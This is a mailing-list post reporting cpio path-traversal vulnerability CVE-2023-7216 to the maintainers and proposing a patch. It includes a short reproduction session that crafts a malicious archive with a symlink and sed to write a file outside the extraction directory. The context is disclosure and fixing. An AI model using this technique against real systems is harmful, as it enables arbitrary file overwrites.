Re:Is there a fix for this CVE-2023-7216?

Thu, 29 Feb 2024 03:11:49 -0800 

Dear cpio maintainer: 
                 
        This is a Red Hat Community Report on 
CVE-2023-7216:https://bugzilla.redhat.com/show_bug.cgi?id=2249901 
         
        CVE-2023-7216 can cause path traversal when opening a cpio archive, 
which can lead to malicious file overwrites of arbitrary directories. 
         
        Redhat CVE-2023-7216's Poc can be reproduced using the following 
method: 
        ``` 
        [root@localhost home]# mkdir testcpio 
        [root@localhost home]# ln -sf /tmp/ testcpio/tmp 
        [root@localhost home]# echo "TEST Traversal" > testcpio/tmpYtrav.txt 
        [root@localhost home]# cd  testcpio/ 
        [root@localhost testcpio]# ls | cpio -ov > ../trav.cpio 
        tmp 
        tmpYtrav.txt 
        1 block 
        [root@localhost testcpio]# cd .. 
        [root@localhost home]# sed -i s/"tmpY"/"tmp\/"/g trav.cpio 
        [root@localhost home]# cpio -i < trav.cpio 
        [root@localhost home]# cat /tmp/trav.txt 
        TEST Traversal 
        [root@localhost home]# cat tmp/trav.txt 
        TEST Traversal 
        ``` 
        First of all, I would like to confirm with you, do you accept 
CVE-2023-7216? Is CVE-2023-7216 a bug or is it the default behavior of cpio 
software?  
        If CVE-2023-7216 is a bug, I try to provide a fix patch. Of course, if 
there is a better fix, please point it out. 
         
        CVE-2023-7216 is similar to CVE-2015-1197,Both of them use symlink to 
cause Path Traversal.The CVE-2015-1197 fix uses symlink_placeholder () to fix a 
Path Traversal issue in the --no-absolute-filenames scenario.However, 
CVE-2023-7216 proves that path traversal also exists in other scenarios.  
         
        So I made a patch to fix CVE-2023-7216, copyin_link() should enable 
symlink_placeholder() by default, not only when the --no-absolute-filenames 
option is on. 
         
        Look forward to your feedback and suggestions soon. 
         
Best Regards, 
Peng 




------------------&nbsp;Original&nbsp;------------------
From:                                                                           
                                             "2773414454"                       
                                                             
<[email protected]&gt;;
Date:&nbsp;Tue, Feb 20, 2024 11:03 AM
To:&nbsp;"bug-cpio"<[email protected]&gt;;

Subject:&nbsp;Is there a fix for this CVE-2023-7216?



Dear cpio maintainer:


    https://nvd.nist.gov/vuln/detail/CVE-2023-7216 
    NVD does not provide any related patch information. 
 
    Is there a fix for cpio's CVE-2023-7216? 
      [1] If not, what is the repair plan for cpio? 
      [2] If yes, can you indicate which submissions fix CVE-2023-7216?


peng

Attachment: 0001-deafult-use-symlink_placeholder-to-fix-Path-Traversa.patch.txt
Description: Binary data

Reply via email to